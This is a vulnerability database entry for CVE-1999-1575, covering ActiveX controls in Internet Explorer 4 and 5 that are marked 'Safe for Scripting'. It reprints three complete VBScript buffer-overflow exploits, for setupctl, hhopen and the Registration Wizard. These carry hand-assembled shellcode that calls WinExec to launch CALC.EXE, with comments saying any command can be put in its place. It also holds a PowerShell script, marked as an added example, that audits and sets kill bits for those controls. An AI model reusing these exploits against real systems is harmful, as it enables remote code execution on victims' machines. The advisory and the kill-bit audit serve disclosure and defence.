CVE-1999-1575
CVSS5.1
Published: 1999-09-10 00:00:00
Revised: 2008-09-05 16:19:51
NMCOE    

[Original] The Kodak/Wang (1) Image Edit (imgedit.ocx), (2) Image Annotation (imgedit.ocx), (3) Image Scan (imgscan.ocx), (4) Thumbnail Image (imgthumb.ocx), (5) Image Admin (imgadmin.ocx), (6) HHOpen (hhopen.ocx), (7) Registration Wizard (regwizc.dll), and (8) IE Active Setup (setupctl.dll) ActiveX controls for Internet Explorer (IE) 4.01 and 5.0 are marked as "Safe for Scripting," which allows remote attackers to create and modify files and execute arbitrary commands.


[CNNVD] Kodak/Wang vulnerability (CNNVD-199909-020)

The Kodak/Wang (1) Image Edit (imgedit.ocx), (2) Image Annotation (imgedit.ocx), (3) Image Scan (imgscan.ocx), (4) Thumbnail Image (imgthumb.ocx), (5) Image Admin (imgadmin.ocx), (6) HHOpen (hhopen.ocx), (7) Registration Wizard (regwizc.dll), and (8) IE Active Setup (setupctl.dll) ActiveX controls for Internet Explorer (IE) 4.01 and 5.0 are marked "Safe for Scripting". Remote attackers can create and modify files and execute arbitrary commands.

- CVSS (base score)

CVSS score: 5.1 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.0    Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:4.0.1  Microsoft Internet Explorer 4.0.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1575
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1575
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-020
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/9162
(UNKNOWN)  CERT-VN  VU#9162
http://www.kb.cert.org/vuls/id/41408
(UNKNOWN)  CERT-VN  VU#41408
http://www.kb.cert.org/vuls/id/26924
(UNKNOWN)  CERT-VN  VU#26924
http://www.kb.cert.org/vuls/id/24839
(UNKNOWN)  CERT-VN  VU#24839
http://www.kb.cert.org/vuls/id/23412
(UNKNOWN)  CERT-VN  VU#23412
http://xforce.iss.net/xforce/xfdb/7097
(UNKNOWN)  XF  wang-kodak-activex-control(7097)
http://www.securityfocus.com/archive/1/28719
(UNKNOWN)  BUGTRAQ  19990924 Several ActiveX Buffer Overruns
http://www.microsoft.com/technet/security/bulletin/ms99-037.mspx
(UNKNOWN)  MS  MS99-037

- Vulnerability information

Kodak/Wang vulnerability
Medium  Unknown
1999-09-10 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches


- Vulnerability information (19515)

MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow (EDBID:19515)
windows remote
1999-09-27 Verified
0 Shane Hird
N/A
Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow

source: http://www.securityfocus.com/bid/667/info

There is a buffer overflow in the setupctl ActiveX control that used to ship with some versions of Microsoft's Internet Explorer. This ActiveX control is used to link to an update site at Microsoft and is marked 'Safe for Scripting'. Arbitrary commands may be executed if the ActiveX control is run in a malicious manner.

SETUPCTL

Apparently a control that was once used for the IE update 
web site which is no longer in use, although it should 
still exist on a lot of systems. With this exploit, similar 
to the PDF exploit, ESP points to our code so we simply RET 
to the same JMP ESP in Shell32. Also, this exploit differs 
in that we set a property first (DistUnit) with the long 
string, then call the method (InstallNow). Again, I have 
simply demonstrated how to execute CALC.EXE, though any 
code can be executed.


<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1" id="setupctl">
</object>

<script language="vbscript"><!--

msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) + "Written by Shane Hird")

expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAA"

expstr = expstr + Chr(235)	'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53)	'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)

'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow

--></script>

- Vulnerability information (19521)

MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability (EDBID:19521)
windows remote
1999-09-27 Verified
0 Shane Hird
N/A
Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4/Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 hhopen OLE Control Buffer Overflow Vulnerability

source: http://www.securityfocus.com/bid/669/info

There is a buffer overflow in the 1.0.0.1 version of the hhopen OLE control (hhopen.ocx) that ships with some versions of Internet Explorer. This control is marked 'Safe for Scripting'. Arbitrary commands may be executed if the OLE control is run in a malicious manner.

HHOPEN:

This control is a little more difficult to exploit, as the 
RET address is in the middle of the string, and once again 
there is no easy way to RET to our code, so I have RET'd to 
ExitProcess directly instead. In this case, OpenHelp is the 
vulnerable method, and the exploit is possible when the 
method is called with a valid help file, and a long Help 
Section.

<object
   classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
 id="hhopen"></OBJECT>

<script language="vbscript"><!--

msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By Shane Hird")

expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Extra padding to trigger the overrun
expstr = expstr & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
                  "AAAAAAAAAAAAAAAAAAAA"

'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr

--></script>


- Vulnerability information (19528)

MS IE 4.1/5.0 Registration Wizard Buffer Overflow (EDBID:19528)
windows local
1999-09-27 Verified
0 Shane Hird
N/A
Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability

source: http://www.securityfocus.com/bid/671/info


There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting'. Arbitrary commands may be executed if the control is run in a malicious manner.

REGWIZC

The Registration Wizard control used by Microsoft to 
register MS products also contains a buffer overrun in 
the 'InvokeRegWizard' method. When called with a long 
string, pre-pended with '/i', we can gain control of the 
RET address and exploit the control in a similar manner as 
the PDF control. This exploit will cause a 'Regwiz.log' 
file to be created in the temporary directory, and once 
again will execute CALC.EXE and terminate the host.

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>

<script language="VbScript" ><!--

msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane Hird")

expstr = "/i " & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32

expstr = expstr & Chr(235)	'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr & Chr(53)	'You may need to use a different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)


'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

RegWizObj.InvokeRegWizard(expstr)

--></script>
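All three write-ups above reach the control from a web page only because Internet Explorer honours the control's "Safe for Scripting" marking; the standard defensive control for an unwanted scriptable ActiveX object is the per-CLSID kill bit. The following PowerShell audit script is an added example, not part of the original advisory, the exploit posts or any Microsoft tool; it uses the three CLSIDs from the <object> tags above and assumes the documented registry layout (HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, DWORD "Compatibility Flags", bit 0x400 = kill bit).

```powershell
# Added example (not from the advisory or from Microsoft): audit, and optionally
# set, the IE kill bit for the controls named in the write-ups above. When bit
# 0x400 of "Compatibility Flags" is set, IE refuses to instantiate the control
# from a page regardless of its "Safe for Scripting" marking.
$Base    = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
$KillBit = 0x400
$Controls = @{   # CLSIDs taken from the <object> tags in the exploits above
    '{F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1}' = 'setupctl.dll (IE Active Setup)'
    '{130D7743-5F5A-11D1-B676-00A0C9697233}' = 'hhopen.ocx (HHOpen)'
    '{50E5E3D1-C07E-11D0-B9FD-00A0249F6B00}' = 'regwizc.dll (Registration Wizard)'
}

function Get-KillBitState {
    param([Parameter(Mandatory)][string]$Clsid)
    # Is the control registered at all on this machine?
    $registered = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $key   = Join-Path $Base $Clsid
    $flags = $null
    if (Test-Path $key) {
        $flags = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    }
    $flagText = if ($null -eq $flags) { 'none' } else { '0x{0:X8}' -f $flags }
    [pscustomobject]@{
        Clsid      = $Clsid
        Registered = $registered
        Flags      = $flagText
        KillBitSet = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
    }
}

function Set-KillBit {
    # Sets bit 0x400 while preserving any other compatibility flags already there.
    # Needs an elevated shell; the control stays registered but IE will not load it.
    param([Parameter(Mandatory)][string]$Clsid)
    $key = Join-Path $Base $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = if ($null -eq $existing) { $KillBit } else { $existing -bor $KillBit }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
}

# Report: a control that is Registered but not KillBitSet is the exposed case.
$Controls.Keys | ForEach-Object { Get-KillBitState $_ } |
    Select-Object Clsid, @{n='Control'; e={ $Controls[$_.Clsid] }}, Registered, Flags, KillBitSet |
    Format-Table -AutoSize

# Remediation (uncomment to apply): $Controls.Keys | ForEach-Object { Set-KillBit $_ }
```

The same audit applies to any CLSID, so the table can be extended with the Kodak/Wang imaging controls listed in the CVE text once their CLSIDs are confirmed from the local registry.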

- Vulnerability information

18537
Kodak/Wang Image Edit (imgedit.ocx) ActiveX for MSIE Permission Weakness
Remote / Network Access, Context Dependent Input Manipulation

- Vulnerability description

Unknown or Incomplete

- Timeline

1999-09-24 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete